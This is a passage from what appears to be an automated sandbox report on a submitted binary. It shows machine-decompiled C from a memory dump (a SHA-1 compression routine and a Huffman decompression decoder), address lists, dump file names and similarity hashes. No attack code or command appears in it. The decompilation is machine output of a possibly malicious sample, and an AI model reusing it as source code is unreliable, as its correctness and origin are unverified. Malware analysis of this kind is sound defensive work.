					_v36 = _v36 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _v36 - 0x70e44324 + ((_v32 | _v28) & _t598 | _v32 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _v36;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v36 = _t842;
					_t811 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v28 | _t842) & _v32 | _v28 & _t842) + _t867 + _v40;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _v40 + 0x8f1bbcdc + ((_t897 | _v36) & _v28 | _t897 & _v36) + _t871 + _v32;
					_v24 = _t897;
					_t898 = _v20;
					_v32 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _v40;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _v36 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _v32;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_v32 = _t899;
					_t858 = _v4;
					_v36 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _v36;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_v40 ^ _v32 ^ _t902) + _t820 + _t845 + _v36 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _v36;
					asm("rol ecx, 0x5");
					_v40 = (_v32 ^ _v28 ^ _t882) + _t825 + _v40 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_v36 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_v32 = (_t604 ^ _v28 ^ _v36) + _t830 + _v32 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v28 = (_t845 ^ _v40 ^ _v36) + _t834 + _v28 + _v32 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _v32;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _v40;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_v32 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _v36;
					_v16 = _t816;
					_v36 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}

0x00e6efef
0x00e6effb
0x00e6f007
0x00e6f011
0x00e6f016
0x00e6f01b
0x00e6effd
0x00e6effd
0x00e6f001
0x00e6f001
0x00e6f01e
0x00e6f027
0x00e6f029
0x00e6f02c
0x00e6f036
0x00e6f03c
0x00e6f040
0x00e6f058
0x00e6f063
0x00e6f065
0x00e6f067
0x00e6f06c
0x00e6f06f
0x00e6f073
0x00e6f077
0x00e6f07a
0x00e6f085
0x00e6f08a
0x00e6f0a4
0x00e6f0a9
0x00e6f0b4
0x00e6f0c1
0x00e6f0c6
0x00e6f0da
0x00e6f0e1
0x00e6f0eb
0x00e6f0f8
0x00e6f101
0x00e6f111
0x00e6f11d
0x00e6f11f
0x00e6f12a
0x00e6f12f
0x00e6f132
0x00e6f146
0x00e6f14d
0x00e6f154
0x00e6f15d
0x00e6f161
0x00e6f165
0x00e6f170
0x00e6f173
0x00e6f176
0x00e6f182
0x00e6f194
0x00e6f197
0x00e6f199
0x00e6f1af
0x00e6f1b7
0x00e6f1bb
0x00e6f1c6
0x00e6f1d8
0x00e6f1df
0x00e6f1e2
0x00e6f1e8
0x00e6f1ea
0x00e6f1ef
0x00e6f1f4
0x00e6f20a
0x00e6f213
0x00e6f215
0x00e6f218
0x00e6f21e
0x00e6f224
0x00e6f233
0x00e6f243
0x00e6f245
0x00e6f24b
0x00e6f24d
0x00e6f253
0x00e6f258
0x00e6f25c
0x00e6f262
0x00e6f266
0x00e6f270
0x00e6f277
0x00e6f27c
0x00e6f27d
0x00e6f281
0x00e6f285
0x00e6f289
0x00e6f289
0x00e6f289
0x00e6f28e
0x00e6f292
0x00e6f29a
0x00e6f2a0
0x00e6f2a3
0x00e6f2a6
0x00e6f2b5
0x00e6f2c4
0x00e6f2c6
0x00e6f2c9
0x00e6f2cf
0x00e6f2d9
0x00e6f2de
0x00e6f2e4
0x00e6f2e8
0x00e6f2ec
0x00e6f2f0
0x00e6f2f4
0x00e6f2f9
0x00e6f30c
0x00e6f31b
0x00e6f31d
0x00e6f320
0x00e6f326
0x00e6f32b
0x00e6f33e
0x00e6f344
0x00e6f348
0x00e6f358
0x00e6f361
0x00e6f36b
0x00e6f36e
0x00e6f370
0x00e6f377
0x00e6f37d
0x00e6f38c
0x00e6f399
0x00e6f39f
0x00e6f3a7
0x00e6f3c8
0x00e6f3cb
0x00e6f3d2
0x00e6f3d6
0x00e6f3d9
0x00e6f3e3
0x00e6f3f3
0x00e6f3f8
0x00e6f400
0x00e6f417
0x00e6f41e
0x00e6f422
0x00e6f424
0x00e6f427
0x00e6f42d
0x00e6f436
0x00e6f446
0x00e6f44b
0x00e6f452
0x00e6f456
0x00e6f45a
0x00e6f465
0x00e6f466
0x00e6f470
0x00e6f470
0x00e6f470
0x00e6f473
0x00e6f476
0x00e6f47d
0x00e6f482
0x00e6f487
0x00e6f48e
0x00e6f49c
0x00e6f4ab
0x00e6f4ad
0x00e6f4b3
0x00e6f4c2
0x00e6f4c5
0x00e6f4c8
0x00e6f4c9
0x00e6f4d5
0x00e6f4d9
0x00e6f4e3
0x00e6f4e5
0x00e6f4ec
0x00e6f4fc
0x00e6f505
0x00e6f507
0x00e6f50a
0x00e6f51e
0x00e6f525
0x00e6f528
0x00e6f532
0x00e6f538
0x00e6f53c
0x00e6f54c
0x00e6f55b
0x00e6f55e
0x00e6f560
0x00e6f563
0x00e6f587
0x00e6f590
0x00e6f593
0x00e6f595
0x00e6f599
0x00e6f5a3
0x00e6f5aa
0x00e6f5c0
0x00e6f5ca
0x00e6f5cc
0x00e6f5d0
0x00e6f5de
0x00e6f5ed
0x00e6f5f5
0x00e6f5fa
0x00e6f601
0x00e6f61a
0x00e6f620
0x00e6f622
0x00e6f626
0x00e6f62c
0x00e6f634
0x00e6f639
0x00e6f649
0x00e6f64f
0x00e6f653
0x00e6f65d
0x00000000
0x00000000
0x00e6f46c
0x00e6f46c
0x00e6f665
0x00e6f666
0x00e6f66a
0x00e6f66a
0x00e6f66a
0x00e6f66f
0x00e6f673
0x00e6f678
0x00e6f67d
0x00e6f682
0x00e6f684
0x00e6f686
0x00e6f68a
0x00e6f699
0x00e6f6a8
0x00e6f6aa
0x00e6f6ad
0x00e6f6b5
0x00e6f6ba
0x00e6f6c3
0x00e6f6c9
0x00e6f6cd
0x00e6f6d1
0x00e6f6d8
0x00e6f6da
0x00e6f6ed
0x00e6f6fc
0x00e6f6fe
0x00e6f701
0x00e6f709
0x00e6f71c
0x00e6f720
0x00e6f724
0x00e6f727
0x00e6f737
0x00e6f740
0x00e6f74a
0x00e6f74d
0x00e6f74f
0x00e6f756
0x00e6f75a
0x00e6f76f
0x00e6f778
0x00e6f77c
0x00e6f780
0x00e6f7a5
0x00e6f7ae
0x00e6f7b1
0x00e6f7b3
0x00e6f7b6
0x00e6f7c4
0x00e6f7d1
0x00e6f7ee
0x00e6f7f1
0x00e6f7f5
0x00e6f7f7
0x00e6f7fa
0x00e6f800
0x00e6f808
0x00e6f811
0x00e6f815
0x00e6f81e
0x00e6f822
0x00e6f824
0x00e6f82b
0x00e6f82f
0x00e6f838
0x00e6f83c
0x00e6f83f
0x00e6f842
0x00e6f845
0x00e6f847
0x00e6f851

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f5bd359781b5b3123466a5dc6871deb785564998a4d1fc58e8050fbd07c65a
Instruction ID: 5f8aab8754c24b0b448177ffa6e3d95dcf075283dae4a5feba85c7354a5444e4
Opcode Fuzzy Hash: 08f5bd359781b5b3123466a5dc6871deb785564998a4d1fc58e8050fbd07c65a
Instruction Fuzzy Hash: C3523AB26047018FC718CF19C891A6AF7E1FFCC304F498A2DE99997255D734EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00E76CBC Relevance: .5, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00E76CBC(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x38);
				 *(_t455 + 0x18) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x18) = _t201;
						 *(_t455 + 0x14) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x10) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00E838AE(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00E66EDC(0xea0f50);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x28) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E00E6A9F3(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x20));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E00E6A9F3(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E00E6A9F3(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x28))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x18);
														_t201 =  *(_t455 + 0x1c);
														_t293 =  *(_t455 + 0x10);
														_t443 =  *((intOrPtr*)(_t455 + 0x20));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x18);
											_t201 =  *(_t455 + 0x1c);
											_t293 =  *(_t455 + 0x10);
											continue;
										}
										_push(_t455 + 0x2c);
										E00E73B93(_t443, _t438);
										_t295[1] =  *(_t455 + 0x2c) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x30);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x38) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x34);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x14) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E00E6A9F3(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x14) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E00E6A9F3(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x24) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x14) + 1;
												 *(_t455 + 0x14) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x14) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x14) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x28);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x14);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E00E7839A(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x24);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E00E7839A(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x24);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E00E6A9F3(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
